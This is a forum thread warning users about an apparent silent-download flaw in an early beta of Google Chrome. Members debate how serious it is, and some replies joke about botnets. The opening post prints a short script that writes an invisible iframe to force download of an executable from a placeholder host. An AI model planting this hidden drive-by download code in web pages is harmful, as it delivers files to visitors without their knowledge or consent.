Do not use Google Chrome


 Share

Recommended Posts

Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically

downloaded to the user's computer without any user prompt.

Example:

<script>

document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');

</script>

This is just insane. this should be on the news or something, im sure that right now this exploit isnt an hour old, but still. its spreading quick enough.

Careful guys

Edited by Matan Mates
Title edited. Please do not use all Caps. Thanks!
Link to comment
Share on other sites

Bugs like that are definitely expected as it is beta, although that is a very bad one. What made me get rid of it was the sentence in the ToS saying they could publish and reproduce anything you post to the internet when using Chrome.

Link to comment
Share on other sites

im looking arround, bugs are appearing everywhere. i found one i think which allows a site to connect a computer to a Zombie sleeper cell net sorta for later use in DDoS attacks, jesus christ

Link to comment
Share on other sites

Of course bugs are appearing everywhere, it is a BETA. This is the first release. Can't expect it to be bug free.

Just be careful where you browse (which goes for any browser).

Link to comment
Share on other sites

im looking arround, bugs are appearing everywhere. i found one i think which allows a site to connect a computer to a Zombie sleeper cell net sorta for later use in DDoS attacks, jesus christ

Uh-huh... :rolleyes:

What's next, it uploads your credit card info to a cave in Afghanistan so Al Qaeda can buy Anthrax and porn?

Link to comment
Share on other sites

Uh-huh... :rolleyes:

What's next, it uploads your credit card info to a cave in Afghanistan so Al Qaeda can buy Anthrax and porn?

ehm... no.

but there is a new exploit allowing al qaeda upload anthrax through google chrome and spread it arround infidels now lol

Link to comment
Share on other sites

it is an interesting security hole. spyware, trojans, keyloggers and zombie bots will love that bypass.

Link to comment
Share on other sites

yeah, if a guy posts about google chrome a day before

20% of his reader get it. then do the vuln on his site, if its famous blog he cant harvest thousands.

Link to comment
Share on other sites

Why, design looks like lego xD

Just curious, but might your extreme excitement and opinions on this be based in any part on a vast portion of your blog pertaining to Firefox?

lego, pokemon ball, window media player logo...the list goes on.

By the way, there is a forum dedicated to Chrome. Here is the link http://www.chrome-forums.net/phpBB3/index.php

Um...did you just create that forum?

Link to comment
Share on other sites

Of course bugs are appearing everywhere, it is a BETA. This is the first release. Can't expect it to be bug free.

Just be careful where you browse (which goes for any browser).

Something as simple and obvious as being able to silently run .exe's should have been tested internally don't you think?

Link to comment
Share on other sites

Something as simple and obvious as being able to silently run .exe's should have been tested internally don't you think?

It doesn't say the exe is being executed, it is just being downloaded so some user interaction is still required. Don't get me wrong though, I understand how serious of an issue it is.

Link to comment
Share on other sites

This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.